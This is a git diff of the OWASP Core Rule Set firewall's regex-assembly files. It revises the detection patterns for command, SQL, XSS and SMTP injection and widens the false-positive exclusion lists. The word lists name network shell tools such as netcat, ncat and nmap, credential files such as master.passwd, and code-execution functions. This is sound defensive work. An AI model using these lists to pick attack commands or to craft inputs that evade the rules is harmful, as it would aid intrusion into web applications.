+# CRS will perform analysis of the response contents if this is enabled and you have
+# the directive `SecResponseBodyAccess On`.
+#
+# Warning: this feature is _enabled_ by default, but depending on your applications
+# you might be targeted in a Request Filter Denial of Service (RFDoS) attack.
+#
+# References: https://blog.sicuranext.com/response-filter-denial-of-service-a-new-way-to-shutdown-a-website/
+#
+# Uncomment this rule to _skip checking responses_.
+#
+#SecAction \
+#    "id:900500,\
+#    phase:1,\
+#    pass,\
+#    t:none,\
+#    nolog,\
+#    tag:'OWASP_CRS',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
+#    setvar:tx.crs_skip_response_analysis=1"
 
 #
 # -- [[ End of setup ]] --------------------------------------------------------
@@ -814,5 +868,5 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
-    setvar:tx.crs_setup_version=460"
+    ver:'OWASP_CRS/4.15.0-dev',\
+    setvar:tx.crs_setup_version=4150"
diff --git a/docs/README.md b/docs/README.md
index 13e798796..fafe76b64 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -7,4 +7,3 @@ Documentation is generated by Hugo and is stored
 in a separate Github repository:
 
 https://github.com/coreruleset/documentation/
-
diff --git a/regex-assembly/920220-chain1.ra b/regex-assembly/920220-chain1.ra
deleted file mode 100644
index b53f964c3..000000000
--- a/regex-assembly/920220-chain1.ra
+++ /dev/null
@@ -1,15 +0,0 @@
-##! Please refer to the documentation at
-##! https://coreruleset.org/docs/development/regex_assembly/.
-
-
-##!^ ^
-##!$ $
-
-##! grab the path, except for the lat path segment (separate rule)
-(.*)/
-##!=>
-##! skip the last path segment, if there is one (non-capturing group)
-(?:[^?]+)?
-##!=>
-##! grab the query string, if there is one
-(\?.*)?
diff --git a/regex-assembly/920221.ra b/regex-assembly/920221.ra
deleted file mode 100644
index 47184249d..000000000
--- a/regex-assembly/920221.ra
+++ /dev/null
@@ -1,12 +0,0 @@
-##! Please refer to the documentation at
-##! https://coreruleset.org/docs/development/regex_assembly/.
-
-
-##!^ ^
-##!$ $
-
-##! find any percent character
-.*%.*
-##!=>
-##! followed by something that looks like a file extension
-\.[^\s.]+
diff --git a/regex-assembly/932125.ra b/regex-assembly/932125.ra
index 2a69987a1..7be381bb4 100644
--- a/regex-assembly/932125.ra
+++ b/regex-assembly/932125.ra
@@ -162,10 +162,10 @@
     iwr@
     ##! disabled for FP: kill
     ls
-    man@
+    ##! disabled for FP: man@
     md@
     ##! disabled for FP: measure
-    mi@
+    ##! disabled for FP: mi@
     mount@
     ##! disabled for FP: move
     mp@
@@ -212,7 +212,7 @@
     ##! disabled for FP: select
     ##! disabled for FP: set
     shcm
-    si@
+    ##! disabled for FP: si@
     sl@
     ##! disabled for FP: sleep
     sls@
diff --git a/regex-assembly/932235.ra b/regex-assembly/932235.ra
index df2b696e3..5be5f0dc6 100644
--- a/regex-assembly/932235.ra
+++ b/regex-assembly/932235.ra
@@ -8,4 +8,4 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
diff --git a/regex-assembly/932236.ra b/regex-assembly/932236.ra
index 205a7cdb2..eb3ed2fdb 100644
--- a/regex-assembly/932236.ra
+++ b/regex-assembly/932236.ra
@@ -11,5 +11,5 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S
-##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
diff --git a/regex-assembly/932237.ra b/regex-assembly/932237.ra
index db57f72d9..d676d02b8 100644
--- a/regex-assembly/932237.ra
+++ b/regex-assembly/932237.ra
@@ -10,6 +10,6 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
-##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
-##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
diff --git a/regex-assembly/932239.ra b/regex-assembly/932239.ra
index a37b41ea2..67cdb604c 100644
--- a/regex-assembly/932239.ra
+++ b/regex-assembly/932239.ra
@@ -11,5 +11,5 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
-##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
diff --git a/regex-assembly/932250.ra b/regex-assembly/932250.ra
index da48fa621..8f342ab91 100644
--- a/regex-assembly/932250.ra
+++ b/regex-assembly/932250.ra
@@ -16,6 +16,6 @@
     ##! This pattern is an approximation of the pattern used by the cmdline
     ##! processor for `@`.
     ##! This pattern is used across multiple files, change with care.
-    [\s<>&|)]
+    [\s<>&|),]|$
   ##!<
 ##!<
diff --git a/regex-assembly/932260.ra b/regex-assembly/932260.ra
index d94b7912c..a30aee519 100644
--- a/regex-assembly/932260.ra
+++ b/regex-assembly/932260.ra
@@ -11,5 +11,5 @@
   ##! These patterns are approximations of the patterns used by the cmdline
   ##! processor for `@` and `~`.
   ##! These patterns are used across multiple files, change with care.
-  ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|)] ~ \S
+  ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
 ##!<
diff --git a/regex-assembly/932270.ra b/regex-assembly/932270.ra
index 01e5b271a..f95f41b26 100644
--- a/regex-assembly/932270.ra
+++ b/regex-assembly/932270.ra
@@ -5,7 +5,6 @@
 ##! Detects the following patterns which are common in Unix shell scripts and one-liners
 
 ~\+$
-~\+[\d\s]+
-~\-$
-~\-[\d\s]+
-~\d+
+~\+\d+
+~-$
+~-\d+
diff --git a/regex-assembly/932271.ra b/regex-assembly/932271.ra
new file mode 100644
index 000000000..49d7bb811
--- /dev/null
+++ b/regex-assembly/932271.ra
@@ -0,0 +1,7 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Bash - Tilde Expansion
+##! Detects the following patterns which are common in Unix shell scripts and one-liners
+
+~\d+
diff --git a/regex-assembly/932300.ra b/regex-assembly/932300.ra
index 9477717f8..b20b89bb9 100644
--- a/regex-assembly/932300.ra
+++ b/regex-assembly/932300.ra
@@ -1,18 +1,19 @@
 ##! Please refer to the documentation at
 ##! https://coreruleset.org/docs/development/regex_assembly/.
 
-##!^ (?is)\r\n.*?\b
+##!+ i
+##!^ \r\n.*?\b
 
-##! - SMTP Commands
-EHLO [a-zA-Z-\.]{1,255}
-HELO [a-zA-Z-\.]{1,255}
-MAIL FROM:<.{1,64}@.{1,255}>
-RCPT TO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}>
-VRFY (?:.{1,64} <.{1,64}@.{1,255}>|.{1,64}@.{1,255})
-EXPN (?:.{1,64})
-AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
+##! SMTP Commands
+EHLO\s[a-z.-]{1,255}
+HELO\s[a-z.-]{1,255}
+MAIL\sFROM:<.{1,64}@.{1,255}>
+RCPT\sTO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}>
+VRFY\s(?:.{1,64}\s<.{1,64}@.{1,255}>|.{1,64}@.{1,255})
+EXPN\s(?:.{1,64})
+AUTH\s[a-z0-9_-]{1,20}\s(?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
 
-##! - SMTP Commands without params
+##! SMTP Commands without params
 STARTTLS\b
 RSET\b
-NOOP\b(?: .{1,255})?
+NOOP\b(?:\s.{1,255})?
diff --git a/regex-assembly/933160.ra b/regex-assembly/933160.ra
index ce664710d..83aa50c11 100644
--- a/regex-assembly/933160.ra
+++ b/regex-assembly/933160.ra
@@ -18,7 +18,7 @@
 ##!$ \)?\s*
 
 ##! mandatory parentheses containing optional parameters
-##!$ \(.*\)
+##!$ \([^)]*\)
 
 assert
 assert_options
@@ -28,6 +28,8 @@ eval
 exec
 file
 filegroup
+fopen
+fputs
 glob
 imagegif
 imagejpeg
@@ -36,12 +38,16 @@ imagewbmp
 imagexbm
 is_a
 md5
+mkdir
 opendir
 passthru
 popen
 readfile
+rtrim
+strip_tags
 tmpfile
 unpack
+usort
 
 ##! English words, or potential snippets of them, are added here to perform a regex match.
 ##! Compared to the parallel match performed by 933150, fewer false positives will be generated.
diff --git a/regex-assembly/934120.ra b/regex-assembly/934120.ra
index 09ff06790..581122346 100644
--- a/regex-assembly/934120.ra
+++ b/regex-assembly/934120.ra
@@ -7,10 +7,6 @@
 
 ##!+ i
 
-##! add capture group
-##!^ (
-##!$ )
-
 ##! This regex starts with a list of all the schemes that can be used to make a request
 ##!> assemble
   ##!> include url-schemes
diff --git a/regex-assembly/941130.ra b/regex-assembly/941130.ra
index 422c34e66..31f72450c 100644
--- a/regex-assembly/941130.ra
+++ b/regex-assembly/941130.ra
@@ -3,15 +3,14 @@
 
 ##!+ i
 ##!^ .
-##!$ \b
 
-\bxlink:href
-\bxhtml
-\bxmlns
-!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM
-!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC
-\bdata:text/html
-\bformaction
-@import
-;base64
-\bpattern\b.*?=
+\bxlink:href\b
+\bxhtml\b
+\bxmlns\b
+!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b
+!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b
+\bdata:text/html\b
+\bformaction\b
+@import\b
+;base64\b
+\bpattern\s*=
diff --git a/regex-assembly/941160.ra b/regex-assembly/941160.ra
index 3d255d92d..fa9e0a809 100644
--- a/regex-assembly/941160.ra
+++ b/regex-assembly/941160.ra
@@ -365,6 +365,7 @@
   onwebkitanimationend
   onwebkitanimationiteration
   onwebkitanimationstart
+  onwebkitplaybacktargetavailabilitychanged
   onwebkittransitionend
   onwheel
   onzoom
diff --git a/regex-assembly/941390.ra b/regex-assembly/941390.ra
index 92288915a..973babcb4 100644
--- a/regex-assembly/941390.ra
+++ b/regex-assembly/941390.ra
@@ -3,7 +3,7 @@
 
 ##!+ i
 ##!^ \b
-##!$ \s*\(
+##!$ \s*[({]
 
 eval
 settimeout
@@ -14,3 +14,7 @@ atob
 btoa
 prompt
 confirm
+import
+fetch
+console\.log
+console\.dir
diff --git a/regex-assembly/942120.ra b/regex-assembly/942120.ra
index f12014ed1..68004c443 100644
--- a/regex-assembly/942120.ra
+++ b/regex-assembly/942120.ra
@@ -1,17 +1,19 @@
 ##! Please refer to the documentation at
 ##! https://coreruleset.org/docs/development/regex_assembly/.
 
+##! Operators == and -> are sourced from https://sqlite.org/lang_expr.html
 ##!+ i
 
+\=\=
 \!\=
 \&\&
 \|\|
+->
 >>
 <<
 >=
 <=
 <>
-<=>
 \bxor\b
 \bregexp\b
 regexp\s+binary
@@ -31,7 +33,7 @@ like\s+null
 \bnotnull\b
 like\s+[\w]+\s+escape\b
 \bilike\b
-[<>=!]{1,2}\s*all\b
+[<>=!]\s*all\b
 \blikelihood\s*\(
 \bunlikely\s*\(
 \blikely\s*\(
diff --git a/regex-assembly/942130.ra b/regex-assembly/942130.ra
index 66beb373e..d5dcb1c92 100644
--- a/regex-assembly/942130.ra
+++ b/regex-assembly/942130.ra
@@ -15,6 +15,10 @@
 
 ##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
 
+##! Suffix: captures the ending part that will be matched on the left hand side of the logical construct.
+
+##!$ [\s'\"`()]*?\b(\w+)\b
+
 ##! These expressions try to match the logic using the operator,
 ##! so when the operator targets a TRUE operation, the initial match
 ##! should be present after the operator, logically meaning TRUE
@@ -24,19 +28,19 @@
 ##! 'f' like 'f'
 
 ##! This one will also match the "equal" part of '<=' and '>='
-=[\s'\"`()]*?\b([\d\w]+)\b
+=
 
 ##! <=> NULL-safe equal to operator in MySQL
-<=>[\s'\"`()]*?\b([\d\w]+)\b
+<=>
 
 ##! Like queries allow you to use wilcards: '%'
 
-like[\s'\"`()]*?\b([\d\w]+)\b
-sounds\s+like[\s'\"`()]*?\b([\d\w]+)\b
+like
+sounds\s+like
 
 ##! GLOB operator is used to match text values against a pattern
-glob[\s'\"`()]*?\b([\d\w]+)\b
+glob
 
 ##! String based regexp. These don't use % as wildcard.
-rlike[\s'\"`()]*?\b([\d\w]+)\b
-regexp[\s'\"`()]*?\b([\d\w]+)\b
+rlike
+regexp
diff --git a/regex-assembly/942131.ra b/regex-assembly/942131.ra
index d4ebdfd92..cdd8d08d8 100644
--- a/regex-assembly/942131.ra
+++ b/regex-assembly/942131.ra
@@ -1,7 +1,6 @@
 ##! Please refer to the documentation at
 ##! https://coreruleset.org/docs/development/regex_assembly/.
 
-
 ##! General comments:
 ##!
 ##! The idea behind this expressions is to capture simple logic based (un)equalities that
@@ -9,7 +8,11 @@
 
 ##! Prefix: captures the initial part that will be unmatched on the right hand side of the logical construct.
 
-##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
+##!^ [\s'\"`()]*?\b(\w+)\b[\s'\"`()]*?
+
+##! Suffix: captures the ending part that will be unmatched on the left hand side of the logical construct.
+
+##!$ [\s'\"`()]*?\b(\w+)\b
 
 ##!+ i
 
@@ -23,20 +26,20 @@
 ##!
 ##! SQL Comparison Operators: !=, <=, >=, <>, <, >, !>, !<, ^
 
-\!=[\s'\"`()]*?\b([\d\w]+)\b
-<>[\s'\"`()]*?\b([\d\w]+)\b
-<[\s'\"`()]*?\b([\d\w]+)\b
-\!<[\s'\"`()]*?\b([\d\w]+)\b
->[\s'\"`()]*?\b([\d\w]+)\b
-\!>[\s'\"`()]*?\b([\d\w]+)\b
-<=[\s'\"`()]*?\b([\d\w]+)\b
->=[\s'\"`()]*?\b([\d\w]+)\b
-\^[\s'\"`()]*?\b([\d\w]+)\b
+\!=
+<>
+<
+\!<
+>
+\!>
+<=
+>=
+\^
 
-is\s+not[\s'\"`()]*?\b([\d\w]+)\b
-not\s+like[\s'\"`()]*?\b([\d\w]+)\b
+is\s+not
+not\s+like
 
 ##! String based regexp.
 
-not\s+rlike[\s'\"`()]*?\b([\d\w]+)\b
-not\s+regexp[\s'\"`()]*?\b([\d\w]+)\b
+not\s+rlike
+not\s+regexp
diff --git a/regex-assembly/942151.ra b/regex-assembly/942151.ra
index 611a28a1e..d1dfd5015 100644
--- a/regex-assembly/942151.ra
+++ b/regex-assembly/942151.ra
@@ -3,4 +3,7 @@
 
 ##!+ i
 
-##!> include sql-injection-function-names
+##!^ \b
+##!$ \W*\(
+
+##!> include-except sql-injection-function-names sql-injection-function-names-fps-pl1
diff --git a/regex-assembly/942152.ra b/regex-assembly/942152.ra
index 611a28a1e..850f5456c 100644
--- a/regex-assembly/942152.ra
+++ b/regex-assembly/942152.ra
@@ -3,4 +3,7 @@
 
 ##!+ i
 
+##!^ \b
+##!$ \W*\(
+
 ##!> include sql-injection-function-names
diff --git a/regex-assembly/942520.ra b/regex-assembly/942520.ra
index 05ae95b3b..43f235c5d 100644
--- a/regex-assembly/942520.ra
+++ b/regex-assembly/942520.ra
@@ -12,7 +12,7 @@ is\s+not\b
 ##! all sqlite not smth from https://www.sqlite.org/lang_expr.html
 not\s+(?:like|glob|between|null|in|regexp|match)\b
 ##! sql operators
-[|&<>*\/%=^+-]
+[|&<>*\/%=^+-]{1,3}
 ##! common operators that can't be added to 942120.data
 (?:mod|div)\b
 sounds\s+like\b
diff --git a/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra
new file mode 100644
index 000000000..f5a352ea7
--- /dev/null
+++ b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra
@@ -0,0 +1,16 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This list excludes command words that are prone to cause false positives
+##! at paranoia level 1.
+
+convert
+degrees
+elt
+left
+likelihood
+lower
+position
+quarter
+space
+unlikely
diff --git a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
index 395046285..1494dc286 100644
--- a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
+++ b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
@@ -13,9 +13,36 @@
 ##! This list contains a subset of commands extracted from the file unix-shell-fps-pl1.ra
 ##! It specifically includes commands for which false positive reports were received.
 
+date
+date@
+date~
+group
+group@
+group~
 more
 more@
 more~
 time
 time@
 time~
+jobs
+jobs@
+jobs~
+last
+last@
+last~
+less
+less@
+less~
+links
+links@
+links~
+local
+local@
+local~
+source
+source@
+source~
+watch
+watch@
+watch~
diff --git a/regex-assembly/exclude/unix-shell-fps-pl1.ra b/regex-assembly/exclude/unix-shell-fps-pl1.ra
index 5fa6bb130..1f7e6e0f1 100644
--- a/regex-assembly/exclude/unix-shell-fps-pl1.ra
+++ b/regex-assembly/exclude/unix-shell-fps-pl1.ra
@@ -26,7 +26,7 @@
 ##!   while read -r oword; do
 ##!     found=0
 ##!     while read -r eword; do
-##!       if grep -qE "^${eword}[@~]?" <<<"${oword}"; then
+##!       if grep -qE "^${eword}[@~]?$" <<<"${oword}"; then
 ##!         result="${result}${eword}${NL}"
 ##!         result="${result}${eword}@${NL}"
 ##!         result="${result}${eword}~${NL}"
@@ -64,6 +64,10 @@
 ##! EOF
 ##! echo "${result}" | sort | uniq >> regex-assembly/exclude/unix-shell-fps-pl1.ra
 
+##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735)
+##!       we've decided to exclude some commands for which only the exact match is an issue
+##!       (mostly for 933236).
+
 GET
 GET@
 GET~
@@ -162,6 +166,9 @@ check_memory
 check_raid
 check_ssl_cert
 check_statusfile
+chef
+chef@
+chef~
 chflags
 chmod
 choom
@@ -197,7 +204,10 @@ cpulimit
 crash
 crash@
 crash~
+cron
+cron@
 crontab
+cron~
 csplit
 csvtool
 cupsfilter
@@ -549,6 +559,11 @@ perms~
 pf
 pf@
 pg
+pg@
+pg~
+php
+php@
+php~
 pic
 pic@
 pico@
@@ -579,6 +594,10 @@ puppet
 puppet@
 puppet~
 pushd
+##! excluded as part of PR #3735
+pwd
+pwd@
+pwd~
 python
 python@
 python~
@@ -588,6 +607,7 @@ rake~
 raku
 rar
 rar@
+rc@
 readelf
 red
 red@
@@ -638,9 +658,6 @@ screen~
 script
 script@
 script~
-self
-self@
-self~
 service
 service@
 service~
@@ -726,8 +743,12 @@ tic@
 tic~
 time
 time@
-timedatectl
 time~
+timedatectl
+##! excluded as part of PR #3735
+timeout
+timeout@
+timeout~
 tmux
 top
 top@
@@ -740,6 +761,10 @@ tshark
 ul
 ul@
 ulimit@
+##! excluded as part of PR #3735
+uname
+uname@
+uname~
 uncompress
 uncompress@
 uncompress~
@@ -789,6 +814,8 @@ whiptail~
 who
 who@
 whois
+whois@
+whois~
 who~
 wireshark
 wish
diff --git a/regex-assembly/exclude/unix-shell-fps-pl2.ra b/regex-assembly/exclude/unix-shell-fps-pl2.ra
index d55b11dd7..fb1dde3d7 100644
--- a/regex-assembly/exclude/unix-shell-fps-pl2.ra
+++ b/regex-assembly/exclude/unix-shell-fps-pl2.ra
@@ -11,33 +11,152 @@
 ##! `awk@` to `awk~`, this list would not have to be updated.
 ##! See also unix-shell-fps-pl1.ra.
 
+##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735)
+##!       we've decided to exclude some commands for which only the exact match is an issure
+##!       (mostly for 933236).
+
 aptitude
 aptitude@
 aptitude~
+##! excluded as part of PR #3735
+cron
+cron@
+cron~
+date
+date@
+date~
+##! excluded as part of PR #3735
+dir
+dir@
+dir~
 dnf
 dnf@
 dnf~
+##! excluded as part of PR #3735
+ed
+ed@
+ed~
+##! excluded as part of PR #3735
+file
+file@
+file~
+##! excluded as part of PR #3735
+GET
+GET@
+GET~
+##! excluded as part of PR #3735
+hash
+hash@
+hash~
+##! excluded as part of PR #3735
+HEAD
+HEAD@
+HEAD~
+##! excluded as part of PR #3735
+id
+id@
+id~
+##! excluded as part of PR #3735
+install
+install@
+install~
+##! excluded as part of PR #3735
+java
+java@
+java~
+##! excluded as part of PR #3735
+mail
+mail@
+mail~
 more
 more@
 more~
+##! excluded as part of PR #3735
+null
+null@
+null~
 pacman
 pacman@
 pacman~
 ps
 ps@
 ps~
+##! excluded as part of PR #3735
+pg
+pg@
+pg~
+##! excluded as part of PR #3735
+php
+php@
+php~
+##! excluded as part of PR #3735
+POST
+POST@
+POST~
+##! excluded as part of PR #3735
+rename
+rename@
+rename~
+##! excluded as part of PR #3735
+repeat
+repeat@
+repeat~
+##! excluded as part of PR #3735
+screen
+screen@
+screen~
+##! excluded as part of PR #3735
+sort
+sort@
+sort~
+##! excluded as part of PR #3735
+ss
+ss@
+ss~
+##! excluded as part of PR #3735
+source
+source@
+source~
+##! excluded as part of PR #3735
+task
+task@
+task~
 time
 time@
 time~
+##! excluded as part of PR #3735
+timeout
+timeout@
+timeout~
+##! excluded as part of PR #3735
+uname
+uname@
+uname~
 up2date
 up2date@
 up2date~
 vi
 vi@
 vi~
+##! excluded as part of PR #3735
+wall
+wall@
+wall~
+##! excluded as part of PR #3735
+view
+view@
+view~
 who
 who@
 who~
+##! excluded as part of PR #3735
+whois
+whois@
+whois~
 w
 w@
 w~
+##! excluded as part of PR #3735
+yes
+yes@
+yes~
diff --git a/regex-assembly/exclude/windows-commands-fps.ra b/regex-assembly/exclude/windows-commands-fps.ra
index a1d77375c..63f8ac41f 100644
--- a/regex-assembly/exclude/windows-commands-fps.ra
+++ b/regex-assembly/exclude/windows-commands-fps.ra
@@ -44,9 +44,13 @@ extract
 find
 finger
 fondue
+##! `for` is not a command but a keyword. We still add it to windows-commands-fps.ra
+for
 format
 ftp
 help
+##! `if` is not a command but a keyword. We still add it to windows-commands-fps.ra
+if
 inactive
 label
 list
@@ -86,4 +90,6 @@ type
 ver
 verifier
 verify
+vol
+where
 writer
diff --git a/regex-assembly/include/sql-injection-function-names.ra b/regex-assembly/include/sql-injection-function-names.ra
index 91b47bf80..d5e367e8d 100644
--- a/regex-assembly/include/sql-injection-function-names.ra
+++ b/regex-assembly/include/sql-injection-function-names.ra
@@ -1,9 +1,6 @@
 ##! Please refer to the documentation at
 ##! https://coreruleset.org/docs/development/regex_assembly/.
 
-##!^ \b
-##!$ \W*\(
-
 adddate
 addtime
 aes_decrypt
diff --git a/regex-assembly/include/unix-shell-4andup.ra b/regex-assembly/include/unix-shell-4andup.ra
index f69c1e9a0..960859442 100644
--- a/regex-assembly/include/unix-shell-4andup.ra
+++ b/regex-assembly/include/unix-shell-4andup.ra
@@ -50,19 +50,25 @@
 ##!   fi
 ##! done <<<"${source}"
 
-##! # check entries for English words and suffix those
+##! # Suffix all English words or words shorter than 5 characters with `@`
 ##! original="${result}"
 ##! english="$(util/fp-finder/spell.sh -m -e - <<<"${result}")"
 ##! result=""
 ##! while read -r oword; do
 ##!   found=0
-##!   while read -r eword; do
-##!     if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then
-##!       result="${result}${oword}@${NL}"
+##!   if [ -n "${oword}" ]; then
+##!     if [ ${#oword} -lt 5 ]; then
 ##!       found=1
-##!       break
+##!     else
+##!       while read -r eword; do
+##!         if ([ "${oword}" = "${eword}" ]); then
+##!           result="${result}${oword}@${NL}"
+##!           found=1
+##!           break
+##!         fi
+##!       done <<<"${english}"
 ##!     fi
-##!   done <<<"${english}"
+##!   fi
 ##!   if [ ${found} -eq 0 ]; then
 ##!     result="${result}${oword}${NL}"
 ##!   fi
@@ -88,10 +94,12 @@ apt-get
 aptitude@
 arch@
 aria2c
+arj-register
+arjdisp
 ascii-xfr
 ascii85
 aspell
-atobm
+atobm@
 axel@
 base32
 base64
@@ -99,7 +107,7 @@ basename@
 basenc
 bash@
 batch@
-blkid
+blkid@
 bpftrace
 breaksw
 bridge@
@@ -112,22 +120,24 @@ bunzip2
 busctl
 busybox
 byebug
-byobu
-bzcat
-bzcmp
+byobu@
+bzcat@
+bzcmp@
 bzdiff
 bzegrep
-bzexe
+bzexe@
 bzfgrep
 bzgrep
-bzip2
+bzip2@
 bzip2recover
 bzless
 bzmore
+c89-gcc
+c99-gcc
 cancel@
 capsh@
 certbot
-chattr
+chattr@
 chdir@
 check_by_ssh
 check_cups
@@ -136,20 +146,21 @@ check_memory
 check_raid
 check_ssl_cert
 check_statusfile
-chef@
 chef-
+chef@
 chflags
 chgpasswd
-chgrp
-chmod
-choom
-chown
+chgrp@
+chmod@
+choom@
+chown@
 chpass
 chroot@
-chsh
+chsh@
 clang@
 clang\+\+
-cobc
+cobc@
+cobcrun
 column@
 comm@
 command@
@@ -158,8 +169,8 @@ compress@
 coproc
 cowsay
 cowthink
-cpan
-cpio
+cpan@
+cpio@
 cpulimit
 crash@
 cron@
@@ -174,35 +185,41 @@ date@
 dhclient
 dialog@
 diff@
-dmesg
+dmesg@
 dmidecode
 dmsetup
-doas
+doas@
 docker@
+docker-
 done@
 dosbox
-dpkg
-dvips
+dpkg-
+dpkg@
+dvips@
 e2fsck
 easy_install
 echo@
-efax
-egrep
-emacs
-endif
-endsw
+efax@
+egrep@
+emacs@
+endif@
+endsw@
 env-update
-esac
-eval
+esac@
+eval@
 exec@
 exiftool
 expand@
 expect@
 export@
-expr
+expr@
 facter
+fdfind@
+fdisk@
+fdmount
+fdumount
 fetch@
-fgrep
+fgrep@
 file@
 filetest
 find@
@@ -211,26 +228,30 @@ fish@
 flock@
 fold@
 foreach
-fping
+fping6
+fping@
 ftpstats
 ftpwho
 function@
 gawk@
-gcore
+gcore@
 genie@
 genisoimage
 getfacl@
-ghci
+ghc-@
+ghci-
+ghci@
 gimp@
-ginsh
+ginsh@
+grcat@
 grep@
 group@
 groupmod
 gtester
 gunzip
-gzcat
-gzexe
-gzip
+gzcat@
+gzexe@
+gzip@
 hash@
 head@
 hexdump
@@ -240,19 +261,22 @@ hostid
 hostname
 hping3
 htdigest
-htop
+htop@
 htpasswd
-iconv
+iconv@
 ifconfig
-iftop
+iftop@
 install@
 ionice
 ip6tables
 ipconfig
+ippeveprinter
+ippfind
+ipptool
 iptables
 ispell
 java@
-jexec
+jexec@
 jobs@
 join@
 journalctl
@@ -262,7 +286,7 @@ killall
 knife@
 ksshell
 last@
-lastcomm
+lastcomm@
 lastlog
 lastlogin
 latex@
@@ -271,7 +295,7 @@ less@
 lessecho
 lessfile
 lesspipe
-lftp
+lftp@
 lftpget
 links@
 local@
@@ -281,14 +305,14 @@ logname
 logsave
 look@
 losetup
-ls-F
+ls-F@
 lsb_release
-lscpu
-lshw
-lsmod
-lsof
-lspci
-lsusb
+lscpu@
+lshw@
+lsmod@
+lsof@
+lspci@
+lsusb@
 ltrace
 lualatex
 luatex
@@ -297,28 +321,28 @@ lwp-dump
 lwp-mirror
 lwp-request
 lynx@
-lz4c
+lz4c@
 lz4cat
-lzcat
-lzcmp
+lzcat@
+lzcmp@
 lzdiff
 lzegrep
 lzfgrep
 lzgrep
 lzless
-lzma
+lzma@
 lzmadec
 lzmainfo
 lzmore
 mail@
-mailq
+mailq@
 mailx@
 make@
 master\.passwd
-mawk
+mawk@
 mkdir@
 mkfifo
-mknod
+mknod@
 mktemp
 mlocate
 more@
@@ -331,86 +355,90 @@ msgfilter
 msgmerge
 msguniq
 mutt@
-mysql
+mysql@
 mysqladmin
 mysqldump
 mysqldumpslow
 mysqlhotcopy
 mysqlshow
 nano@
-nasm
-nawk
+nasm@
+nawk@
 nc\.openbsd
 nc\.traditional
-ncat
+ncat@
 neofetch
 netcat
 netkit-ftp
 netplan
 netstat
 nice@
-nmap
+nmap@
 node@
-nohup
-nping
-nroff
+nohup@
+nping@
+nroff@
 nsenter
 nslookup
-nstat
+nstat@
 null@
 octave@
 onintr
